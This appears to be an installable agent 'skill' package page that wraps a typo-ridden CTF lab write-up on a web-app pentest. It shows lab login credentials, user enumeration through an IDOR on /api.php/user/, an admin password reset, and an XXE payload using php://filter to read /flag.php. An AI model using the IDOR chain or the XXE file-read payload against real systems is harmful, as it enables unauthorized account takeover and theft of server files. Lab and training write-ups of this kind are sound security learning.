>Agent Skill

@anchovy317/web-attack

skilldevelopment

Performing a web app pentest for sof comanpym and task y iwth testing the lastest of their social network web app.

testingapi-design

apm::install

$apm install @anchovy317/web-attack

apm::skill.md

apm::badge

[![APM](https://img.shields.io/endpoint?url=https%3A%2F%2Fapm-p1ls2dz87-atlamors-projects.vercel.app%2Fapi%2Fbadge%2F%40anchovy317%2Fweb-attack&style=flat-square)](https://apm-p1ls2dz87-atlamors-projects.vercel.app/packages/@anchovy317/web-attack)

# Scenario:
Performing a web app pentest for sof comanpym and task y iwth testing the lastest of their social network web app.
Try to escalate your privileges and exploit different vulnerabilities to read the flag at '/flag.php'.

## 94.237.53.52:5948

##  Write up:

### Enumeration in caido
1. Log in the app with the creadentials:
- User htb-student
- Pass: Academy_student!

2. Login Requests in Caido:
- 301 redirect response following  a successful login.
- 200 ok resposne
- Api get

3. Potential IDOR:
We'll focus on the dir /api.php/user/74
![Automate](../Img/Web-attck-skill11.png)

![Automate](../Img/Web-attck-skill1.png)
Then we cam enumerate the users and find de admin user for login. We can chage the password in the dir /reset.php.
![Reset](../Img/Web-attck-skill3.png)
Now we can access to the admin user ---> PWD

4.Exploit with php filetering
```xml
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE email [
    <!ENTITY Test SYSTEM "php://filter/convert.base64-encode/resource=/flag.php">]>
<root>
  <name>&Test;</name>
  <details>test</details>
   <date></date>
</root>

```
![Flag](../Img/Web-attck-skill-flag.png)

![Flag](../Img/Web-attck-skill-flag-cy.png)